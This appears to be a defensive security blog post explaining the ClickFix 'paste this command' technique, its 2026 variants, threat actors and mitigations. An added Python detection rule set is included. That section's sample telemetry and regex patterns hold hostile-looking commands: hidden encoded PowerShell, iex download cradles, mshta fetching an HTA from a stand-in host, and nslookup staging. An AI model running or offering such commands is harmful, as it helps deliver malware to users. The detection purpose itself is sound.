
What is ClickFix? The Social Engineering Attack That Became the #1 Initial Access Method

The ClickFix Social Engineering ecosystem
Updated March 2026: Added Windows terminal variant, crashfix and DNS-based delivery, MIMICRAT campaign, and compromised Chrome extension attacks from Q1 2026.

ClickFix is a social engineering technique that tricks users into running malicious commands on their own computers, bypassing security controls by making the victim the attack vector. Microsoft's 2025 Digital Defense Report confirmed ClickFix as the number one initial access method, responsible for 47% of all attacks observed by Microsoft Defender Experts, surpassing traditional phishing at 35% (Microsoft, 2025). ESET's H1 2025 Threat Report measured a 517% surge in ClickFix attacks over six months, with the technique accounting for 8% of all blocked threats (ESET, 2025).

That 47% figure should be taken seriously. Nearly half of all initial compromises Microsoft tracked last year came down to users being tricked into pasting commands. No exploit. No vulnerability. Just social engineering and a clipboard.


How a ClickFix Attack Works

The core mechanic is quite simple and seems obvious now. Attackers convince users to copy and execute malicious commands through legitimate system tools.

Step 1: The fake prompt. You land on a webpage showing what looks like a CAPTCHA verification, a browser error, or a document rendering problem. Attackers clone real interfaces: Cloudflare Turnstile, Google reCAPTCHA, Microsoft authentication, and Okta login pages have all been replicated in ClickFix campaigns (Proofpoint, 2024; Unit 42, 2025).

Step 2: The clipboard hijack. When you interact with the fake prompt, malicious code is silently copied to your clipboard. The page's JavaScript has already staged the payload. Unit 42 describes this as "pastejacking" because the user is unknowingly pasting attacker-controlled commands (Palo Alto Networks, 2025).

Step 3: The execution. The prompt tells you to press Windows+R to open the Run dialogue, then Ctrl+V to paste, then Enter. That single sequence executes a PowerShell script, an mshta command, or a cmd instruction that downloads malware directly into memory. The entire attack takes seconds.

macOS and Linux users face the same technique. On macOS, users are directed to paste commands into Terminal. ESET confirmed ClickFix affects all major operating systems (ESET, 2025).

The name "ClickFix" was coined by Proofpoint researchers in 2024, reflecting how attackers almost always include buttons labelled "Fix", "How to fix", or "Fix it." From 2010 to 2015, Microsoft's own "Fix it" solutions trained users to click automated repair prompts. Attackers exploit that conditioned behaviour.

Why ClickFix Bypasses EDR and Email Security

I have worked with security teams deploying endpoint protection for many years in a past life. The reason ClickFix is so effective is not that defences are weak. It is that the attack turns the user into the delivery mechanism.

From an EDR perspective, ClickFix looks like a user launching powershell.exe from explorer.exe. Normal behaviour. No malicious file written to disk, no suspicious parent-child process chain, no exploit triggering a detection rule. The payload executes directly in memory using living-off-the-land binaries (LOLBins) such as msbuild.exe, regasm.exe, or powershell.exe (Microsoft, 2025).

Email security scans attachments and URLs. ClickFix campaigns often contain only a clean URL that redirects through traffic distribution systems (TDS) before landing on the attack page. Browser protections like Google Safe Browsing do not trigger because the browser is not downloading an executable. The user is.

Bitdefender noted that most malicious domains have already done their damage and been abandoned before any blocklist catches up (Bitdefender, 2025). Attackers spin up new domains faster than reputation services can flag them.

New ClickFix Variants in 2026: CrashFix, DNS Delivery, and MIMICRAT

The technique is not standing still. Three significant evolutions have emerged in 2026.

CrashFix: Breaking Your Browser on Purpose

In January 2026, Huntress identified a new ClickFix variant they named CrashFix, delivered through a malicious Chrome extension called NexShield that impersonated the legitimate uBlock Origin Lite ad blocker (Huntress, 2026). The attack deliberately crashes the victim's browser by flooding the browser with chrome.runtime port connections in a loop that burns through available memory until Chrome or Edge stops responding.

After the user force-closes and restarts, a professional-looking security warning claims the browser "stopped abnormally" and recommends a scan. The fake alert leads to the familiar ClickFix execution: Win+R, Ctrl+V, Enter. The clipboard already holds the payload.

Microsoft Defender Experts called CrashFix a "notable escalation in ClickFix tradecraft" because it creates a genuine technical problem rather than faking one (Microsoft Security Blog, 2026).

The final payload is ModeloRAT, a previously undocumented Python-based RAT. KongTuke, the threat actor behind CrashFix, deliberately targets domain-joined machines, deploying ModeloRAT only on corporate endpoints with Active Directory access. Non-domain machines receive incomplete test payloads. That distinction tells you exactly what they are after: corporate networks where one compromised machine opens the door to lateral movement (Huntress, 2026).

ClickFix via DNS: The Nslookup Variant

In February 2026, Microsoft disclosed a variant using nslookup to retrieve payloads through DNS queries rather than traditional web requests (Microsoft Security Blog, 2026). The victim runs a command that performs a DNS lookup against a hard-coded external server. The response contains encoded instructions that stage the next phase of the attack.

DNS as a delivery channel works because most organisations do not scrutinise DNS response payloads, letting attack traffic hide inside routine lookups. The attack chain delivers ModeloRAT through a ZIP archive containing a portable Python interpreter, establishing persistence through Windows Startup folder shortcuts.

ClickFix Through Compromised Websites

Also in February 2026, Elastic Security documented a campaign abusing bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript (The Hacker News, 2026). The compromised site displayed a fake Cloudflare verification page delivering a previously undocumented RAT called MIMICRAT (also known as AstarionRAT). The attack chain patched Windows Event Tracing (ETW) to disable logging, a significant evasion technique.

This campaign shares infrastructure overlaps with attacks documented by Huntress that delivered the Matanbuchus 3.0 loader, suspected to enable ransomware deployment or data exfiltration.

ClickFix via Windows Terminal: Bypassing Run Dialogue Detections

On 6 March 2026, Microsoft Threat Intelligence disclosed a campaign observed in February that replaces the familiar Win+R shortcut with Win+X followed by I, which launches Windows Terminal (wt.exe) directly. The shift is deliberate. Security teams that built detection rules around suspicious activity from the Run dialogue now miss this variant entirely.

Windows Terminal is a legitimate administrative tool that developers and sysadmins open routinely. From a SIEM perspective, a user launching wt.exe and running PowerShell inside it looks like a normal workflow. The payload itself uses commands that are hex-encoded and XOR-obfuscated, chained through multiple PowerShell processes that unpack and run the next stage. The attack chain downloads a renamed 7-Zip binary to extract a multi-stage payload that adds Microsoft Defender exclusions, collects system and browser data, and ultimately deploys Lumma Stealer. Lumma Stealer then hooks into Chrome and Edge browser processes through the QueueUserAPC() API to extract saved login credentials (Microsoft Threat Intelligence, 2026).

A second infection path uses EtherHiding, a technique that leverages blockchain smart contracts for command-and-control communications, making traditional domain blocking ineffective.

For defenders, this variant means detection rules must now cover wt.exe as a parent process for suspicious PowerShell activity, not just explorer.exe or the Run dialogue.

Which Threat Actors Use ClickFix

ClickFix emerged in early 2024 from cybercriminal operations, first documented by Proofpoint in campaigns by the initial access broker TA571 and the ClearFake malware cluster (Proofpoint, 2024). Adoption was rapid.

Cybercriminal campaigns now deliver a wide range of payloads. Lumma Stealer is the most common final payload based on Microsoft's observations, responsible for 51% of infections. Other regularly delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, and the Amatera and Rhadamanthys infostealers (Microsoft, 2025). ClickFix builders are now sold commercially, providing weaponised landing pages ready to deploy (ESET, 2025).

Underground markets sell ClickFix kits for $200 to $1,500 monthly, with customisable lures, VM detection bypass, and UAC evasion included (GBHackers).

Nation-state adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

  • Kimsuky (North Korea) targeted think tanks researching North Korean policy, impersonating a Japanese diplomat to build trust before delivering QuasarRAT
  • MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday
  • APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
  • UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

(Proofpoint, 2025)

When nation-state actors adopt a criminal technique this quickly, they are telling you it works against hardened targets. That is the part that should concern security teams more than the volume numbers.

Enterprise targeting is accelerating. Unit 42 reported assisting in nearly a dozen incident response cases where ClickFix was the initial access vector, impacting organisations across technology, financial services, professional services, and manufacturing (Palo Alto Networks, 2025). The Storm-1865 campaign impersonated Booking.com to target hospitality organisations across North America, Europe, and Asia.

Common ClickFix Lures in 2026

Attackers continuously refine their social engineering. Current campaigns use these pretexts:

  • Fake CAPTCHAs cloning Cloudflare Turnstile, Google reCAPTCHA, and similar verification pages
  • Browser crash recovery (CrashFix variant) creating genuine browser failures then offering a "fix"
  • Browser update prompts claiming the page requires an update to display correctly
  • Document viewer errors requiring a "plugin" to view PDF or Word files
  • Video conferencing issues impersonating Google Meet or Zoom with "fix your audio/video" prompts
  • Enterprise login pages cloning DocuSign, Okta, and other business services (Unit 42, 2025)
  • Compromised Chrome extensions such as QuickLens (February 2026) injecting ClickFix prompts into fake Google Update alerts (Bleeping Computer, 2026)
  • Social media verification scams instructing users to copy authentication tokens for supposed verified badge eligibility (Hunt.io, 2025)
  • Social Security Administration notices about supposed account issues (observed June 2025)

The QuickLens case is worth highlighting. A legitimate extension with thousands of users changed ownership in February 2026. The new owner pushed version 5.8, which stripped browser security headers and introduced ClickFix attacks alongside cryptocurrency wallet theft (Bleeping Computer, 2026). If you think "I only install extensions from the Chrome Web Store," that protection is no longer sufficient.

ClickFix MITRE ATT&CK Techniques

ClickFix maps to several MITRE ATT&CK techniques across the attack chain:

  • T1204.002 (User Execution: Malicious File) - The victim manually executes the malicious command
  • T1059.001 (Command and Scripting Interpreter: PowerShell) - Primary execution mechanism on Windows
  • T1059.002 (AppleScript) - Execution mechanism on macOS
  • T1218.005 (System Binary Proxy Execution: mshta.exe) - Proxies execution through trusted binaries
  • T1115 (Clipboard Data) - Clipboard hijacking stages the payload
  • T1027 (Obfuscated Files or Information) - PowerShell commands are typically Base64-encoded
  • T1071.004 (Application Layer Protocol: DNS) - The February 2026 nslookup variant uses DNS for payload delivery

The reliance on user execution (T1204) is precisely why automated defences struggle. MITRE classifies this as an "execution" technique, not "initial access," because the user is the execution engine.

How to Defend Against ClickFix Attacks

No single control stops ClickFix. Here is what works based on what I have seen deployed successfully.

How to Block ClickFix with Group Policy and WDAC

Restrict PowerShell and script execution for standard users through Group Policy or Windows Defender Application Control (WDAC). This is the highest-impact single control. If non-administrative users cannot execute PowerShell, the most common ClickFix payload fails. Treat this as a high priority: it helps across many payload scenarios, including new variants.

Block or monitor LOLBin abuse. Configure AppLocker or WDAC rules for mshta.exe, wscript.exe, cscript.exe, and finger.exe. Microsoft specifically recommended restricting outbound access for the finger utility (TCP port 79) after observing it abused in CrashFix campaigns (Microsoft Security Blog, 2026).

Enable PowerShell Script Block Logging. Non-negotiable. Without it, you have no forensic visibility into what ClickFix payloads executed. Enable Module Logging, Script Block Logging, and Transcription logging through Group Policy.

Monitor clipboard-to-terminal patterns. Alert on sequences of Win+R followed by PowerShell or cmd execution within short timeframes. This is anomalous for most business users.

Deploy DNS monitoring. The nslookup variant uses DNS as a staging channel. Monitor for nslookup commands executed from user-initiated processes targeting external DNS servers.

Review browser extension policies. After the NexShield and QuickLens incidents, restrict extension installation to approved lists where feasible. Monitor for extensions requesting unusual permissions like declarativeNetRequestWithHostAccess.

What to Train Employees About ClickFix

Technical controls reduce the attack surface. Training addresses the root cause.

The core message fits on a poster: Legitimate websites never ask you to open Run, PowerShell, or Terminal. If a website tells you to press Win+R or paste a command, close it and report it.

Reinforce these points:

  • CAPTCHA verification never requires running system commands
  • Browser errors do not require pasting code to fix
  • No website needs access to your clipboard, Run dialogue, or Terminal
  • If your browser crashes and immediately offers a "scan," that is suspicious

Microsoft recommends building specific playbooks for ClickFix rather than relying on generic phishing awareness (Microsoft MDDR, 2025). The attack is different enough from email phishing that existing training may not cover it.

How to Detect ClickFix in Your SIEM

For organisations running SIEM platforms, these detection opportunities have proven effective:

  • Alert on PowerShell execution initiated from the Windows Run dialogue (explorer.exe > powershell.exe with specific command-line patterns)
  • Monitor for encoded PowerShell commands (Base64 strings in command-line arguments)
  • Flag HTTP requests with PowerShell user agents to external infrastructure
  • Detect mshta.exe or finger.exe spawned from browser processes
  • Monitor for SyncAppvPublishingServer.vbs execution, abused in recent campaigns to proxy PowerShell through a signed Microsoft component (Blackpoint, 2026)
  • Alert on Windows Terminal (wt.exe) spawning PowerShell with encoded or hex-encoded command-line arguments, particularly when preceded by user-initiated Win+X keyboard shortcuts

Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules targeting ClickFix behaviour patterns. For ELK-based detection implementation, see our ELK Stack Security Monitoring Tutorial.
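To make the detection opportunities above concrete, here is an added example (not code from the original post, and not a published Sigma rule) that encodes them as a small rule set and runs it over constructed Sysmon Event ID 1 style records. It covers the Run dialogue chain, the Windows Terminal variant, mshta.exe and finger.exe from browser or launcher parents, the nslookup DNS-staging variant, and SyncAppvPublishingServer.vbs abuse; field names, sample paths, domains and IPs are assumptions made for the example.

```python
"""Rule set for ClickFix-style execution chains in process-creation telemetry."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# The Run dialogue spawns children from explorer.exe; the 2026 variant goes through
# Windows Terminal, which shows up as wt.exe or WindowsTerminal.exe as the parent.
TERMINALS = {"wt.exe", "windowsterminal.exe"}
USER_LAUNCHERS = {"explorer.exe"} | TERMINALS

ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}")
HEX_BLOB_RE = re.compile(r"(?<![0-9A-Fa-f])[0-9A-Fa-f]{64,}(?![0-9A-Fa-f])")
CRADLE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr|irm)\b")
PRIVATE_RE = re.compile(r"^(?:10\.|127\.|192\.168\.|172\.(?:1[6-9]|2\d|3[01])\.)")


def basename(path: str) -> str:
    """File name of an image path, lower-cased, so rules compare names only."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of the rules an event matches; empty list means nothing fired."""
    parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    hits = []
    # 1. Shell spawned by the Run dialogue or Windows Terminal with a staged payload.
    if image in SHELLS and parent in USER_LAUNCHERS:
        origin = "terminal" if parent in TERMINALS else "run_dialog"
        if ENCODED_RE.search(cmd):
            hits.append(f"encoded_shell_from_{origin}")
        if HEX_BLOB_RE.search(cmd):
            hits.append(f"hex_blob_from_{origin}")
        if CRADLE_RE.search(cmd):
            hits.append(f"download_cradle_from_{origin}")
    # 2. mshta.exe / finger.exe from a browser, or from the launchers a pasted command uses.
    if image in {"mshta.exe", "finger.exe"} and parent in BROWSERS | USER_LAUNCHERS:
        hits.append(f"{image[:-4]}_from_{parent[:-4]}")
    # 3. nslookup from a user-driven process with an explicit non-private DNS server.
    if image == "nslookup.exe" and parent in SHELLS | USER_LAUNCHERS:
        args = [a for a in cmd.split()[1:] if not a.startswith("-")]
        if len(args) >= 2 and not PRIVATE_RE.match(args[-1]):
            hits.append("nslookup_external_server")
    # 4. Signed App-V script used to proxy PowerShell.
    if "syncappvpublishingserver.vbs" in cmd.lower():
        hits.append("syncappvpublishingserver_proxy")
    return hits


# Constructed sample telemetry; the base64 and hex strings are filler, not payloads.
FILLER_B64 = "QUFB" * 12   # 48 base64 characters
FILLER_HEX = "41" * 32     # 64 hex characters
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\powershell.exe",
     "CommandLine": f"powershell -w hidden -enc {FILLER_B64}"},
    {"ParentImage": r"C:\Program Files\Terminal\WindowsTerminal.exe",
     "Image": r"C:\Windows\System32\powershell.exe",
     "CommandLine": f"powershell -nop -w hidden -c $s='{FILLER_HEX}';iex $s"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://update.example.invalid/check.hta"},
    {"ParentImage": r"C:\Windows\System32\powershell.exe", "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup -type=txt stage.example.invalid 203.0.113.5"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Process"},          # benign admin use
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup intranet.corp.local 10.0.0.53"},              # benign internal lookup
]


def scan(events: list) -> dict:
    """Map event index -> rule hits, keeping only events that fired at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

An explorer.exe parent alone is not a signal, since Start menu launches look the same; the rules therefore only fire on command-line indicators, and tuning the private-range list and browser set to your estate is expected.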


Summary

ClickFix represents a shift I have seen develop over many years: from breaking systems to exploiting people. The industry spent billions on endpoint protection, and attackers responded by making the endpoint user the delivery mechanism. First observed in March 2024. Adopted by nation-state groups by late 2024. Named the number one initial access method by Microsoft in 2025. Evolving into CrashFix, DNS-based delivery, and compromised extension attacks in 2026. Builders are now commercially available, lowering the barrier for any attacker.

The defence requires three things: restrict script execution for standard users, train people to recognise these specific lures, and build detection rules for the execution patterns. If you have not done all three, you are exposed to the most common initial access technique currently observed.

For a broader view of how social engineering techniques like ClickFix fit into the current threat landscape, see our AI Security Threats guide. For more on the infostealers that ClickFix commonly delivers, see our breakdown of what infostealers are and how they work.



Last updated: March 2026

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering technique that tricks users into executing malicious commands on their own computers. Attackers use fake CAPTCHA prompts, browser errors, or document viewer problems to convince victims to open the Windows Run dialogue and paste a PowerShell command that has been silently copied to their clipboard. Microsoft identified ClickFix as the number one initial access method in 2025, responsible for 47% of observed attacks.

How does a ClickFix attack work?

The attack follows three steps. First, a fake prompt appears on a webpage claiming the user needs to verify their identity or fix a problem. Second, malicious code is silently copied to the user's clipboard through JavaScript on the page. Third, the user is instructed to press Windows+R, Ctrl+V, and Enter, which executes the hidden malicious command. The entire sequence takes seconds and bypasses most automated security controls because the user initiates the execution.

What malware does ClickFix deliver?

The most common payload is Lumma Stealer, responsible for 51% of observed infections (Microsoft, 2025). Other frequently delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, ModeloRAT, and MIMICRAT. Recent campaigns have also delivered ransomware-enabling payloads.

Can ClickFix target Mac and Linux users?

Yes. ClickFix affects all major operating systems. macOS campaigns direct users to paste commands into Terminal instead of the Windows Run dialogue, delivering Atomic macOS Stealer (AMOS) and other payloads. Linux systems are also targeted through terminal-based command execution. ESET confirmed cross-platform targeting in their H1 2025 report.

What is CrashFix?

CrashFix is a ClickFix variant identified by Huntress in January 2026. It uses a malicious Chrome extension that deliberately crashes the browser, then displays a fake security warning offering to "fix" the problem. Unlike standard ClickFix which fakes errors, CrashFix creates a genuine browser crash, making the social engineering more convincing. It delivers ModeloRAT and specifically targets corporate domain-joined machines.

How do I protect my organisation against ClickFix?

The most effective defence combines three measures: restrict PowerShell and script execution for non-administrative users through Group Policy or WDAC, train employees that legitimate verification prompts never require running system commands, and deploy detection rules for ClickFix execution patterns. Microsoft recommends building ClickFix-specific response playbooks rather than relying on generic phishing training.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) targeting government, defence, and think tank organisations between late 2024 and early 2025. The rapid adoption by state-sponsored groups confirms the technique's effectiveness against security-aware targets.

Is ClickFix the same as phishing?

ClickFix is a form of social engineering but differs from traditional phishing. Phishing typically delivers malware through email attachments or malicious links that trigger automatic downloads. ClickFix requires the user to manually execute the command through a system tool like PowerShell or Terminal. Many email security controls that catch phishing do not detect ClickFix because the execution originates from a trusted user action.


References and Sources

  1. Microsoft. (2025). 2025 Digital Defense Report. ClickFix identified as the number one initial access method, accounting for 47% of observed attacks by Defender Experts. Traditional phishing accounted for 35%.
  2. ESET. (2025). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks. Confirmed ClickFix builders are sold commercially.
  3. Proofpoint. (2025). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by Kimsuky, MuddyWater, APT28, and UNK_RemoteRogue.
  4. Proofpoint. (2024). ClickFix Social Engineering Technique Floods Threat Landscape. Initial documentation of ClickFix emergence by TA571 and ClearFake cluster.
  5. Huntress. (2026). Dissecting CrashFix: KongTuke's New Toy. Discovery of CrashFix variant, NexShield malicious extension, and ModeloRAT deployment targeting corporate environments.
  6. Microsoft Security Blog. (2026). New ClickFix Variant "CrashFix" Deploying Python Remote Access Trojan. Technical analysis of CrashFix as a notable escalation in ClickFix tradecraft.
  7. Microsoft Security Blog. (2026). DNS-Based ClickFix Attack Using Nslookup for Malware Staging. Disclosure of nslookup-based ClickFix variant using DNS as a delivery channel.
  8. Microsoft Security Blog. (2025). Think Before You Click(Fix). Comprehensive technical analysis of ClickFix campaigns including LOLBin abuse and fileless payload delivery.
  9. Palo Alto Networks Unit 42. (2025). Fix the Click: Preventing the ClickFix Attack Vector. Unit 42 assisted in nearly a dozen IR cases with ClickFix as initial access.
  10. Elastic Security. (2026). MIMICRAT campaign analysis via compromised bincheck[.]io site deploying previously undocumented RAT with ETW patching.
  11. Bleeping Computer. (2026). QuickLens Chrome Extension Steals Crypto, Shows ClickFix Attack. Compromised extension introduced ClickFix attacks and crypto wallet theft in version 5.8 update.
  12. Blackpoint. (2026). ClickFix campaign abusing SyncAppvPublishingServer.vbs (signed Microsoft App-V script) to distribute Amatera infostealer.
  13. Bitdefender. (2025). ClickFix: A KISS from Cybercriminals. Analysis of EDR detection challenges and Lumma Stealer delivery through ClickFix.
  14. Kaspersky. (2026). Variations of the ClickFix. Documentation of finger.exe abuse, ad blocker impersonation, and expanded lure types.
  15. Microsoft Threat Intelligence. (2026). ClickFix campaign using Windows Terminal (wt.exe) to deliver Lumma Stealer via hex-encoded PowerShell commands and QueueUserAPC injection. Disclosed 6 March 2026.